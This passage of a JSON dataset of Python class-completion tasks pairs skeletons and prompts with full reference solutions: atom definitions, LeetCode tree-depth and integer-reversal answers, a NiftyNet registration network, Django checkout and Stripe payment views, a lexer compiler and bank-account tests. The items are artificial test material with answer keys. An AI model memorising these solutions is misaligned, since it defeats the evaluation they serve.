self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "class_docstring": "Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.", "class_name": "DefinitionAtom", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. 
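The only non-obvious arithmetic in the `AboutUpdateView` record is the crop call: the form delivers cropper-style fields x, y, width, height, while Pillow's Image.crop wants a (left, upper, right, lower) box — hence `photo.crop((x, y, w + x, h + y))`. A tiny check with a synthetic image (requires Pillow):

from PIL import Image

photo = Image.new('RGB', (400, 300))
x, y, w, h = 50, 40, 200, 150
cropped = photo.crop((x, y, x + w, y + h))   # (left, upper, right, lower)
print(cropped.size)                          # (200, 150)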
It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000348", "length_bytes": 12649, "license_type": "permissive", "methods": [{"docstring": "Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)", "name": "__init__", "signature": "def __init__(self, serial, name, resName, x, y, z)"}, {"docstring": "Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false", "name": "isBackbone", "signature": "def isBackbone(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002962", "prompt": "Implement the Python class `DefinitionAtom` described below.\n\nClass description:\nClass DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\n\nMethod signatures and docstrings:\n- def __init__(self, serial, name, resName, x, y, z): Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\n- def isBackbone(self): Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false", "prompted_full_text": "Implement the Python class `DefinitionAtom` described below.\n\nClass description:\nClass DefinitionAtom The DefinitionAtom class inherits off the Atom class. 
It provides a trimmed down version of the initializating function from the Atom class for the definition files.\n\nMethod signatures and docstrings:\n- def __init__(self, serial, name, resName, x, y, z): Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\n- def isBackbone(self): Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\n\n<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n<|end_body_0|>\n\n<|body_start_1|>\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n<|end_body_1|>\n", "revision_id": "a50f0b2f7104007c730baa51b4ec65c891008c47", "skeleton": "<|skeleton|>\nclass DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. 
(float)\"\"\"\n <|body_0|>\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DefinitionAtom:\n \"\"\"Class DefinitionAtom The DefinitionAtom class inherits off the Atom class. It provides a trimmed down version of the initializating function from the Atom class for the definition files.\"\"\"\n\n def __init__(self, serial, name, resName, x, y, z):\n \"\"\"Initialize using a few basic parameters - set all other fields to null, which is necessary for debugging output by using the string function in the parent class. Parameters serial: Atom serial number (int) name: Atom name. (string) resName: Residue name. (string) resSeq: Residue sequence number. (int) x: Orthogonal coordinates for X in Angstroms. (float) y: Orthogonal coordinates for Y in Angstroms. (float) z: Orthogonal coordinates for Z in Angstroms. (float)\"\"\"\n self.type = 'ATOM'\n self.serial = serial\n self.name = name\n self.altLoc = ''\n self.resName = resName\n self.chainID = ''\n self.resSeq = 1\n self.iCode = ''\n self.x = x\n self.y = y\n self.z = z\n self.occupancy = 0.0\n self.tempFactor = 0.0\n self.segID = ''\n self.element = ''\n self.charge = ''\n self.ffcharge = 0.0\n self.radius = 0.0\n self.intrabonds = []\n self.residue = None\n self.refdistance = None\n\n def isBackbone(self):\n \"\"\"Return true if atom name is in backbone, otherwise false Returns state: 1 if true, 0 if false\"\"\"\n state = 0\n if self.name in BACKBONE:\n state = 1\n return state\n", "source": "the_stack_v2_python_sparse", "source_path": "mscreen/autodocktools_prepare_py3k/MolKit/pdb2pqr/definitions.py", "source_repo": "e-mayo/mscreen", "split": "test", "star_events_count": 10} {"blob_id": "a494402d72c8c73c06be7ecaef7cd76acf3268c1", "bodies": ["if not root:\n return 0\nleft_subtree_depth = self.minDepth(root.left)\nright_subtree_depth = self.minDepth(root.right)\nreturn (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1", "if not root:\n return 0\nqueue = [root]\nmin_depth = 0\nrow_node_num = 1\nwhile row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)"], "bodies_text": "<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n 
\"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000349", "length_bytes": 1745, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: int", "name": "minDepth", "signature": "def minDepth(self, root)"}, {"docstring": "迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点", "name": "minDepthIterate", "signature": "def minDepthIterate(self, root)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002658", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minDepth(self, root): :type root: TreeNode :rtype: int\n- def minDepthIterate(self, root): 迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minDepth(self, root): :type root: TreeNode :rtype: int\n- def minDepthIterate(self, root): 迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\n\n<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n<|end_body_1|>\n", "revision_id": "8853f85214ac88db024d26e228f1848dd5acd933", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n <|body_0|>\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minDepth(self, root):\n \"\"\":type root: TreeNode :rtype: int\"\"\"\n if not root:\n return 0\n left_subtree_depth = self.minDepth(root.left)\n right_subtree_depth = self.minDepth(root.right)\n return (min(left_subtree_depth, 
right_subtree_depth) or max(left_subtree_depth, right_subtree_depth)) + 1\n\n def minDepthIterate(self, root):\n \"\"\"迭代方式,层序遍历,遇到的第一个叶子节点就是最小深度的节点\"\"\"\n if not root:\n return 0\n queue = [root]\n min_depth = 0\n row_node_num = 1\n while row_node_num > 0:\n min_depth += 1\n while row_node_num > 0:\n current_node = queue.pop(0)\n if not current_node.left and (not current_node.right):\n return min_depth\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n row_node_num -= 1\n row_node_num = len(queue)\n", "source": "the_stack_v2_python_sparse", "source_path": "111-MinimumDepthofBinaryTree/MinimumDepthofBinaryTree.py", "source_repo": "cqxmzhc/my_leetcode_solutions", "split": "test", "star_events_count": 2} {"blob_id": "976ef4a4e02f900221e023f10dda42e190459cf7", "bodies": ["BaseNet.__init__(self, name=name)\nself.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\nself.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\nself.interp = interp\nself.boundary = boundary", "affine_field = self.global_net(fixed_image, moving_image, is_training)\ndense_field = self.local_net(fixed_image, moving_image, is_training)\nreturn (dense_field + affine_field, dense_field, affine_field)"], "bodies_text": "<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "class_docstring": "### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai", "class_name": "INetHybridTwoStream", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building 
blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000350", "length_bytes": 7784, "license_type": "permissive", "methods": [{"docstring": ":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name", "name": "__init__", "signature": "def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream')"}, {"docstring": ":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in 
use :return: estimated total, dense and affine displacement fields", "name": "layer_op", "signature": "def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002527", "prompt": "Implement the Python class `INetHybridTwoStream` described below.\n\nClass description:\n### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\n\nMethod signatures and docstrings:\n- def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'): :param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\n- def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs): :param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields", "prompted_full_text": "Implement the Python class `INetHybridTwoStream` described below.\n\nClass description:\n### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\n\nMethod signatures and docstrings:\n- def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'): :param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param 
affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\n- def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs): :param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\n\n<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n<|end_body_0|>\n\n<|body_start_1|>\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = 
self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n<|end_body_1|>\n", "revision_id": "67db048685705e36622bc2851b4c7794e56065ad", "skeleton": "<|skeleton|>\nclass INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n <|body_0|>\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class INetHybridTwoStream:\n \"\"\"### Description Re-implementation of the registration network proposed in: Hu et al., Label-driven weakly-supervised learning for multimodal deformable image registration, arXiv:1711.01666 https://arxiv.org/abs/1711.01666 Hu et al., Weakly-Supervised Convolutional Neural Networks for Multimodal Image Registration, Medical Image Analysis (2018) https://doi.org/10.1016/j.media.2018.07.002 see also: https://github.com/YipengHu/label-reg ### Building blocks [GLOBAL] - INetAffine from interventional_affine_net.py [DENSE] - INetDense from intervetional_dense_net.py ### Diagram INPUT PAIR --> [GLOBAL] --> AFFINE FIELD --- DENSE + AFFINE FIELD | | -------> [DENSE] --> DENSE FIELD ------ ### Constrai\"\"\"\n\n def __init__(self, decay, affine_w_initializer=None, affine_b_initializer=None, disp_w_initializer=None, disp_b_initializer=None, acti_func='relu', interp='linear', boundary='replicate', name='inet-hybrid-two-stream'):\n \"\"\":param decay: float, regularisation decay :param affine_w_initializer: weight initialisation for affine registration network :param affine_b_initializer: bias 
initialisation for affine registration network :param disp_w_initializer: weight initialisation for dense registration network :param disp_b_initializer: bias initialisation for dense registration network :param acti_func: activation function to use :param interp: string, type of interpolation for the resampling [default:linear] - not in use :param boundary: string, padding mode to deal with image boundary [default: replicate] - not is use :param name: layer name\"\"\"\n BaseNet.__init__(self, name=name)\n self.global_net = INetAffine(decay=decay, affine_w_initializer=affine_w_initializer, affine_b_initializer=affine_b_initializer, acti_func=acti_func, name='inet-global')\n self.local_net = INetDense(decay=decay, disp_w_initializer=disp_w_initializer, disp_b_initializer=disp_b_initializer, acti_func=acti_func, name='inet-local')\n self.interp = interp\n self.boundary = boundary\n\n def layer_op(self, fixed_image, moving_image, is_training=True, **unused_kwargs):\n \"\"\":param fixed_image: tensor, fixed image for registration (defines reference space) :param moving_image: tensor, moving image to be registered to fixed :param is_training: boolean, True if network is in training mode :param unused_kwargs: not in use :return: estimated total, dense and affine displacement fields\"\"\"\n affine_field = self.global_net(fixed_image, moving_image, is_training)\n dense_field = self.local_net(fixed_image, moving_image, is_training)\n return (dense_field + affine_field, dense_field, affine_field)\n", "source": "the_stack_v2_python_sparse", "source_path": "niftynet/network/interventional_hybrid_net.py", "source_repo": "BRAINSia/NiftyNet", "split": "test", "star_events_count": 0} {"blob_id": "1480a8b6ed72711a0ba32cf235a299a605d61d6d", "bodies": ["res = 0\nif x < 0:\n symbol = -1\n x = -x\nelse:\n symbol = 1\nwhile x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\nreturn 0 if res > pow(2, 31) else res * symbol", "temp = str(x)\nif temp[0] != '-':\n temp = temp[::-1]\nelse:\n temp2 = temp[1:]\n temp2 = temp2[::-1]\n temp = temp[0] + temp2\nreturn int(temp) if -2 ** 31 - 1 < int(temp) < 2 ** 31 else 0"], "bodies_text": "<|body_start_0|>\n res = 0\n if x < 0:\n symbol = -1\n x = -x\n else:\n symbol = 1\n while x:\n pop = x % 10\n x = x // 10\n res = res * 10 + pop\n return 0 if res > pow(2, 31) else res * symbol\n<|end_body_0|>\n\n<|body_start_1|>\n temp = str(x)\n if temp[0] != '-':\n temp = temp[::-1]\n 